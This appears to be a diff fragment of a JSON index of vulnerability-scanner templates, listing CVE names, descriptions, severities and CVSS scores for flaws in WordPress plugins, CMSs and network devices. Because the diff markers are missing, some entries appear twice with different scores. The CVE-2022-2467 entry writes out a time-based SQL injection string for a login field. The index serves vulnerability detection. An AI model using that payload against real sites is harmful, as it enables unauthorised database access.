{"ID":"CVE-2021-25099","Info":{"Name":"WordPress GiveWP \u003c2.17.3 - Cross-Site Scripting","Severity":"medium","Description":"WordPress GiveWP plugin before 2.17.3 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the form_id parameter before returning it in the response of an unauthenticated request via the give_checkout_login AJAX action. An attacker can inject arbitrary script in the browser of a user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-25099.yaml"}
{"ID":"CVE-2021-25104","Info":{"Name":"WordPress Ocean Extra \u003c1.9.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Ocean Extra plugin before 1.9.5 contains a cross-site scripting vulnerability. The plugin does not escape generated links which are then used when the OceanWP theme is active.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-25104.yaml"}
@ -1262,8 +1263,8 @@
{"ID":"CVE-2021-36749","Info":{"Name":"Apache Druid - Local File Inclusion","Severity":"medium","Description":"Apache Druid ingestion system is vulnerable to local file inclusion. The InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-36749.yaml"}
{"ID":"CVE-2021-36873","Info":{"Name":"WordPress iQ Block Country \u003c=1.2.11 - Cross-Site Scripting","Severity":"medium","Description":"WordPress iQ Block Country plugin 1.2.11 and prior contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2021/CVE-2021-36873.yaml"}
{"ID":"CVE-2021-37216","Info":{"Name":"QSAN Storage Manager \u003c3.3.3 - Cross-Site Scripting","Severity":"medium","Description":"QSAN Storage Manager before 3.3.3 contains a reflected cross-site scripting vulnerability. Header page parameters do not filter special characters. Remote attackers can inject JavaScript to access and modify specific data.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-37216.yaml"}
{"ID":"CVE-2021-37304","Info":{"Name":"Jeecg Boot \u003c= 2.4.5 - Information Disclosure","Severity":"high","Description":"An Insecure Permissions issue in jeecg-boot 2.4.5 allows unauthenticated remote attackers to gain escalated privilege and view sensitive information via the httptrace interface.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2021/CVE-2021-37304.yaml"}
{"ID":"CVE-2021-37305","Info":{"Name":"Jeecg Boot \u003c= 2.4.5 - Sensitive Information Disclosure","Severity":"high","Description":"Jeecg Boot \u003c= 2.4.5 API interface has unauthorized access and leaks sensitive information such as email,phone and Enumerate usernames that exist in the system.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2021/CVE-2021-37305.yaml"}
{"ID":"CVE-2021-37304","Info":{"Name":"Jeecg Boot \u003c= 2.4.5 - Information Disclosure","Severity":"high","Description":"An Insecure Permissions issue in jeecg-boot 2.4.5 allows unauthenticated remote attackers to gain escalated privilege and view sensitive information via the httptrace interface.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-37304.yaml"}
{"ID":"CVE-2021-37305","Info":{"Name":"Jeecg Boot \u003c= 2.4.5 - Sensitive Information Disclosure","Severity":"high","Description":"Jeecg Boot \u003c= 2.4.5 API interface has unauthorized access and leaks sensitive information such as email,phone and Enumerate usernames that exist in the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-37305.yaml"}
{"ID":"CVE-2021-37416","Info":{"Name":"Zoho ManageEngine ADSelfService Plus \u003c=6103 - Cross-Site Scripting","Severity":"medium","Description":"Zoho ManageEngine ADSelfService Plus 6103 and prior contains a reflected cross-site scripting vulnerability on the loadframe page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-37416.yaml"}
{"ID":"CVE-2021-37538","Info":{"Name":"PrestaShop SmartBlog \u003c4.0.6- SQL Injection","Severity":"critical","Description":"PrestaShop SmartBlog by SmartDataSoft \u003c 4.0.6 is vulnerable to a SQL injection vulnerability in the blog archive functionality.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-37538.yaml"}
{"ID":"CVE-2021-37573","Info":{"Name":"Tiny Java Web Server - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) \u003c=1.115 allows an adversary to inject malicious code on the server's \"404 Page not Found\" error page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-37573.yaml"}
@ -1281,7 +1282,7 @@
{"ID":"CVE-2021-39144","Info":{"Name":"XStream 1.4.18 - Remote Code Execution","Severity":"high","Description":"XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Setups which followed XStream's security recommendations with an allow-list are not impacted.\n","Classification":{"CVSSScore":"8.5"}},"file_path":"http/cves/2021/CVE-2021-39144.yaml"}
{"ID":"CVE-2021-39146","Info":{"Name":"XStream 1.4.18 - Arbitrary Code Execution","Severity":"high","Description":"XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Setups which followed XStream's security recommendations with an allow-list are not impacted.\n","Classification":{"CVSSScore":"8.5"}},"file_path":"http/cves/2021/CVE-2021-39146.yaml"}
{"ID":"CVE-2021-39152","Info":{"Name":"XStream \u003c1.4.18 - Server-Side Request Forgery","Severity":"high","Description":"XStream before 1.4.18 is susceptible to server-side request forgery. An attacker can request data from internal resources that are not publicly available by manipulating the processed input stream with a Java runtime version 14 to 8. This makes it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"8.5"}},"file_path":"http/cves/2021/CVE-2021-39152.yaml"}
{"ID":"CVE-2021-39165","Info":{"Name":"Cachet \u003c=2.3.18 - SQL Injection","Severity":"high","Description":"Cachet is an open source status page. With Cachet prior to and including 2.3.18, there is a SQL injection which is in the `SearchableTrait#scopeSearch()`. Attackers without authentication can utilize this vulnerability to exfiltrate sensitive data from the database such as administrator's password and session. The original repository of Cachet \u003chttps://github.com/CachetHQ/Cachet\u003e is not active, the stable version 2.3.18 and it's developing 2.4 branch is affected.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2021/CVE-2021-39165.yaml"}
{"ID":"CVE-2021-39165","Info":{"Name":"Cachet \u003c=2.3.18 - SQL Injection","Severity":"medium","Description":"Cachet is an open source status page. With Cachet prior to and including 2.3.18, there is a SQL injection which is in the `SearchableTrait#scopeSearch()`. Attackers without authentication can utilize this vulnerability to exfiltrate sensitive data from the database such as administrator's password and session. The original repository of Cachet \u003chttps://github.com/CachetHQ/Cachet\u003e is not active, the stable version 2.3.18 and it's developing 2.4 branch is affected.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-39165.yaml"}
{"ID":"CVE-2021-39211","Info":{"Name":"GLPI 9.2/\u003c9.5.6 - Information Disclosure","Severity":"medium","Description":"GLPI 9.2 and prior to 9.5.6 is susceptible to information disclosure via the telemetry endpoint, which discloses GLPI and server information. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2021/CVE-2021-39211.yaml"}
{"ID":"CVE-2021-39226","Info":{"Name":"Grafana Snapshot - Authentication Bypass","Severity":"high","Description":"Grafana instances up to 7.5.11 and 8.1.5 allow remote unauthenticated users to view the snapshot associated with the lowest database key by accessing the literal paths /api/snapshot/:key or /dashboard/snapshot/:key. If the snapshot is in public mode, unauthenticated users can delete snapshots by accessing the endpoint /api/snapshots-delete/:deleteKey. Authenticated users can also delete snapshots by accessing the endpoints /api/snapshots-delete/:deleteKey, or sending a delete request to /api/snapshot/:key, regardless of whether or not the snapshot is set to public mode (disabled by default).","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2021/CVE-2021-39226.yaml"}
{"ID":"CVE-2021-39312","Info":{"Name":"WordPress True Ranker \u003c2.2.4 - Local File Inclusion","Severity":"high","Description":"WordPress True Ranker before version 2.2.4 allows sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file via local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-39312.yaml"}
@ -1440,7 +1441,7 @@
{"ID":"CVE-2022-0760","Info":{"Name":"WordPress Simple Link Directory \u003c7.7.2 - SQL injection","Severity":"critical","Description":"WordPress Simple Link Directory plugin before 7.7.2 contains a SQL injection vulnerability. The plugin does not validate and escape the post_id parameter before using it in a SQL statement via the qcopd_upvote_action AJAX action, available to unauthenticated and authenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0760.yaml"}
{"ID":"CVE-2022-0769","Info":{"Name":"Users Ultra \u003c= 3.1.0 - SQL Injection","Severity":"critical","Description":"The Users Ultra WordPress plugin through 3.1.0 fails to properly sanitize and escape the data_target parameter before it is being interpolated in an SQL statement and then executed via the rating_vote AJAX action (available to both unauthenticated and authenticated users), leading to an SQL Injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0769.yaml"}
{"ID":"CVE-2022-0773","Info":{"Name":"Documentor \u003c= 1.5.3 - Unauthenticated SQL Injection","Severity":"critical","Description":"The Documentor WordPress plugin through 1.5.3 fails to sanitize and escape user input before it is being interpolated in an SQL statement and then executed, leading to an SQL Injection exploitable by unauthenticated users.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0773.yaml"}
{"ID":"CVE-2022-0776","Info":{"Name":"RevealJS postMessage \u003c4.3.0 - Cross-Site Scripting","Severity":"medium","Description":"RevealJS postMessage before 4.3.0 contains a cross-site scripting vulnerability via the document object model.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-0776.yaml"}
{"ID":"CVE-2022-0776","Info":{"Name":"RevealJS postMessage \u003c4.3.0 - Cross-Site Scripting","Severity":"medium","Description":"RevealJS postMessage before 4.3.0 contains a cross-site scripting vulnerability via the document object model.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0776.yaml"}
{"ID":"CVE-2022-0781","Info":{"Name":"WordPress Nirweb Support \u003c2.8.2 - SQL Injection","Severity":"critical","Description":"WordPress Nirweb support plugin before 2.8.2 contains a SQL injection vulnerability. The plugin does not sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0781.yaml"}
{"ID":"CVE-2022-0784","Info":{"Name":"WordPress Title Experiments Free \u003c9.0.1 - SQL Injection","Severity":"critical","Description":"WordPress Title Experiments Free plugin before 9.0.1 contains a SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement via the wpex_titles AJAX action, available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0784.yaml"}
{"ID":"CVE-2022-0785","Info":{"Name":"WordPress Daily Prayer Time \u003c2022.03.01 - SQL Injection","Severity":"critical","Description":"WordPress Daily Prayer Time plugin prior to 2022.03.01 contains a SQL injection vulnerability.. It does not sanitise and escape the month parameter before using it in a SQL statement via the get_monthly_timetable AJAX action, available to unauthenticated users, leading to SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0785.yaml"}
@ -1451,7 +1452,7 @@
{"ID":"CVE-2022-0826","Info":{"Name":"WordPress WP Video Gallery \u003c=1.7.1 - SQL Injection","Severity":"critical","Description":"WordPress WP Video Gallery plugin through 1.7.1 contains a SQL injection vulnerability. The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0826.yaml"}
{"ID":"CVE-2022-0827","Info":{"Name":"WordPress Best Books \u003c=2.6.3 - SQL Injection","Severity":"critical","Description":"WordPress Best Books plugin through 2.6.3 is susceptible to SQL injection. The plugin does not sanitize and escape some parameters before using them in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0827.yaml"}
{"ID":"CVE-2022-0846","Info":{"Name":"SpeakOut Email Petitions \u003c 2.14.15.1 - SQL Injection","Severity":"critical","Description":"The SpeakOut! Email Petitions WordPress plugin before 2.14.15.1 does not sanitise and escape the id parameter before using it in a SQL statement via the dk_speakout_sendmail AJAX action, leading to an SQL Injection exploitable by unauthenticated users.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0846.yaml"}
{"ID":"CVE-2022-0864","Info":{"Name":"UpdraftPlus \u003c 1.22.9 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape the updraft_interval parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2022/CVE-2022-0864.yaml"}
{"ID":"CVE-2022-0864","Info":{"Name":"UpdraftPlus \u003c 1.22.9 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape the updraft_interval parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0864.yaml"}
{"ID":"CVE-2022-0867","Info":{"Name":"WordPress ARPrice \u003c3.6.1 - SQL Injection","Severity":"critical","Description":"WordPress ARPrice plugin prior to 3.6.1 contains a SQL injection vulnerability. It fails to properly sanitize and escape user supplied POST data before being inserted in an SQL statement and executed via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0867.yaml"}
{"ID":"CVE-2022-0869","Info":{"Name":"nitely/spirit 0.12.3 - Open Redirect","Severity":"medium","Description":"Multiple Open Redirect in GitHub repository nitely/spirit prior to 0.12.3.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0869.yaml"}
{"ID":"CVE-2022-0870","Info":{"Name":"Gogs \u003c0.12.5 - Server-Side Request Forgery","Severity":"medium","Description":"Gogs GitHub repository before 0.12.5 is susceptible to server-side request forgery. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-0870.yaml"}
@ -1510,7 +1511,7 @@
{"ID":"CVE-2022-21705","Info":{"Name":"October CMS - Remote Code Execution","Severity":"high","Description":"October CMS is susceptible to remote code execution. In affected versions, user input is not properly sanitized before rendering. An authenticated user with the permissions to create, modify, and delete website pages can bypass cms.safe_mode and cms.enableSafeMode in order to execute arbitrary code. This affects admin panels that rely on safe mode and restricted permissions.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-21705.yaml"}
{"ID":"CVE-2022-2185","Info":{"Name":"GitLab CE/EE - Remote Code Execution","Severity":"high","Description":"GitLab CE/EE 14.0 prior to 14.10.5, 15.0 prior to 15.0.4, and 15.1 prior to 15.1.1 is susceptible to remote code execution. An authenticated user authorized to import projects can import a maliciously crafted project, thus possibly being able to execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2022/CVE-2022-2185.yaml"}
{"ID":"CVE-2022-2187","Info":{"Name":"WordPress Contact Form 7 Captcha \u003c0.1.2 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Contact Form 7 Captcha plugin before 0.1.2 contains a reflected cross-site scripting vulnerability. It does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-2187.yaml"}
{"ID":"CVE-2022-2219","Info":{"Name":"Unyson \u003c 2.7.27 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape the QUERY_STRING before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting in browsers which do not encode characters\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2022/CVE-2022-2219.yaml"}
{"ID":"CVE-2022-2219","Info":{"Name":"Unyson \u003c 2.7.27 - Cross Site Scripting","Severity":"high","Description":"The plugin does not sanitise and escape the QUERY_STRING before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting in browsers which do not encode characters\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-2219.yaml"}
{"ID":"CVE-2022-22242","Info":{"Name":"Juniper Web Device Manager - Cross-Site Scripting","Severity":"medium","Description":"Juniper Web Device Manager (J-Web) in Junos OS contains a cross-site scripting vulnerability. This can allow an unauthenticated attacker to run malicious scripts reflected off J-Web to the victim's browser in the context of their session within J-Web, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue affects all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-22242.yaml"}
{"ID":"CVE-2022-22536","Info":{"Name":"SAP Memory Pipes (MPI) Desynchronization","Severity":"critical","Description":"SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2022/CVE-2022-22536.yaml"}
{"ID":"CVE-2022-22733","Info":{"Name":"Apache ShardingSphere ElasticJob-UI privilege escalation","Severity":"medium","Description":"Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache ShardingSphere ElasticJob-UI allows an attacker who has guest account to do privilege escalation. This issue affects Apache ShardingSphere ElasticJob-UI Apache ShardingSphere ElasticJob-UI 3.x version 3.0.0 and prior versions.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2022/CVE-2022-22733.yaml"}
@ -1550,7 +1551,7 @@
{"ID":"CVE-2022-2462","Info":{"Name":"WordPress Transposh \u003c=1.0.8.1 - Information Disclosure","Severity":"medium","Description":"WordPress Transposh plugin through is susceptible to information disclosure via the AJAX action tp_history, which is intended to return data about who has translated a text given by the token parameter. However, the plugin also returns the user's login name as part of the user_login attribute. If an anonymous user submits the translation, the user's IP address is returned. An attacker can leak the WordPress username of translators and potentially execute other unauthorized operations.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-2462.yaml"}
{"ID":"CVE-2022-2467","Info":{"Name":"Garage Management System 1.0 - SQL Injection","Severity":"critical","Description":"Garage Management System 1.0 contains a SQL injection vulnerability in /login.php via manipulation of the argument username with input 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-2467.yaml"}
{"ID":"CVE-2022-24681","Info":{"Name":"ManageEngine ADSelfService Plus \u003c6121 - Stored Cross-Site Scripting","Severity":"medium","Description":"ManageEngine ADSelfService Plus before 6121 contains a stored cross-site scripting vulnerability via the welcome name attribute to the Reset Password, Unlock Account, or User Must Change Password screens.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-24681.yaml"}
{"ID":"CVE-2022-24716","Info":{"Name":"Icinga Web 2 - Arbitrary File Disclosure","Severity":"high","Description":"Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Unauthenticated users can leak the contents of files of the local system accessible to the web-server user, including `icingaweb2` configuration files with database credentials.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2022/CVE-2022-24716.yaml"}
{"ID":"CVE-2022-24716","Info":{"Name":"Icinga Web 2 - Arbitrary File Disclosure","Severity":"high","Description":"Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Unauthenticated users can leak the contents of files of the local system accessible to the web-server user, including `icingaweb2` configuration files with database credentials.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-24716.yaml"}
{"ID":"CVE-2022-24816","Info":{"Name":"GeoServer \u003c1.2.2 - Remote Code Execution","Severity":"critical","Description":"Programs run on GeoServer before 1.2.2 which use jt-jiffle and allow Jiffle script to be provided via network request are susceptible to remote code execution. The Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects downstream GeoServer 1.1.22.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-24816.yaml"}
{"ID":"CVE-2022-24856","Info":{"Name":"Flyte Console \u003c0.52.0 - Server-Side Request Forgery","Severity":"high","Description":"FlyteConsole is the web user interface for the Flyte platform. FlyteConsole prior to version 0.52.0 is vulnerable to server-side request forgery when FlyteConsole is open to the general internet. An attacker can exploit any user of a vulnerable instance to access the internal metadata server or other unauthenticated URLs. Passing of headers to an unauthorized actor may occur.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-24856.yaml"}
{"ID":"CVE-2022-2486","Info":{"Name":"Wavlink WN535K2/WN535K3 - OS Command Injection","Severity":"critical","Description":"Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade via manipulation of the argument key. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-2486.yaml"}
@ -1581,7 +1582,7 @@
{"ID":"CVE-2022-26148","Info":{"Name":"Grafana \u0026 Zabbix Integration - Credentials Disclosure","Severity":"critical","Description":"Grafana through 7.3.4, when integrated with Zabbix, contains a credential disclosure vulnerability. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-26148.yaml"}
{"ID":"CVE-2022-26159","Info":{"Name":"Ametys CMS Information Disclosure","Severity":"medium","Description":"Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-26159.yaml"}
{"ID":"CVE-2022-26233","Info":{"Name":"Barco Control Room Management Suite \u003c=2.9 Build 0275 - Local File Inclusion","Severity":"high","Description":"Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. Requests must begin with the \"GET /..\\..\" substring.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-26233.yaml"}
{"ID":"CVE-2022-26263","Info":{"Name":"Yonyou U8 13.0 - Cross-Site Scripting","Severity":"medium","Description":"Yonyou U8 13.0 contains a DOM-based cross-site scripting vulnerability via the component /u8sl/WebHelp. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-26263.yaml"}
{"ID":"CVE-2022-26263","Info":{"Name":"Yonyou U8 13.0 - Cross-Site Scripting","Severity":"medium","Description":"Yonyou U8 13.0 contains a DOM-based cross-site scripting vulnerability via the component /u8sl/WebHelp. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-26263.yaml"}
{"ID":"CVE-2022-2627","Info":{"Name":"WordPress Newspaper \u003c12 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Newspaper theme before 12 is susceptible to cross-site scripting. The does not sanitize a parameter before outputting it back in an HTML attribute via an AJAX action. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-2627.yaml"}
{"ID":"CVE-2022-2633","Info":{"Name":"All-In-One Video Gallery \u003c=2.6.0 - Server-Side Request Forgery","Severity":"high","Description":"WordPress All-in-One Video Gallery plugin through 2.6.0 is susceptible to arbitrary file download and server-side request forgery (SSRF) via the 'dl' parameter found in the ~/public/video.php file. An attacker can download sensitive files hosted on the affected server and forge requests to the server.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2022/CVE-2022-2633.yaml"}
{"ID":"CVE-2022-26352","Info":{"Name":"DotCMS - Arbitrary File Upload","Severity":"critical","Description":"DotCMS management system contains an arbitrary file upload vulnerability via the /api/content/ path which can allow attackers to upload malicious Trojans to obtain server permissions.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-26352.yaml"}
@ -1717,7 +1718,7 @@
{"ID":"CVE-2022-38295","Info":{"Name":"Cuppa CMS v1.0 - Cross Site Scripting","Severity":"medium","Description":"Cuppa CMS v1.0 was discovered to contain a cross-site scripting vulnerability at /table_manager/view/cu_user_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field under the Add New Group function.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-38295.yaml"}
{"ID":"CVE-2022-38296","Info":{"Name":"Cuppa CMS v1.0 - Arbitrary File Upload","Severity":"critical","Description":"Cuppa CMS v1.0 was discovered to contain an arbitrary file upload vulnerability via the File Manager.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-38296.yaml"}
{"ID":"CVE-2022-38463","Info":{"Name":"ServiceNow - Cross-Site Scripting","Severity":"medium","Description":"ServiceNow through San Diego Patch 4b and Patch 6 contains a cross-site scripting vulnerability in the logout functionality, which can enable an unauthenticated remote attacker to execute arbitrary JavaScript.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-38463.yaml"}
{"ID":"CVE-2022-38467","Info":{"Name":"CRM Perks Forms \u003c 1.1.1 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape some parameters from a sample file before outputting them back in the page, leading to Reflected Cross-Site Scripting\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2022/CVE-2022-38467.yaml"}
{"ID":"CVE-2022-38467","Info":{"Name":"CRM Perks Forms \u003c 1.1.1 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape some parameters from a sample file before outputting them back in the page, leading to Reflected Cross-Site Scripting\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-38467.yaml"}
{"ID":"CVE-2022-38553","Info":{"Name":"Academy Learning Management System \u003c5.9.1 - Cross-Site Scripting","Severity":"medium","Description":"Academy Learning Management System before 5.9.1 contains a cross-site scripting vulnerability via the Search parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-38553.yaml"}
{"ID":"CVE-2022-38637","Info":{"Name":"Hospital Management System 1.0 - SQL Injection","Severity":"critical","Description":"Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/user-login.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-38637.yaml"}
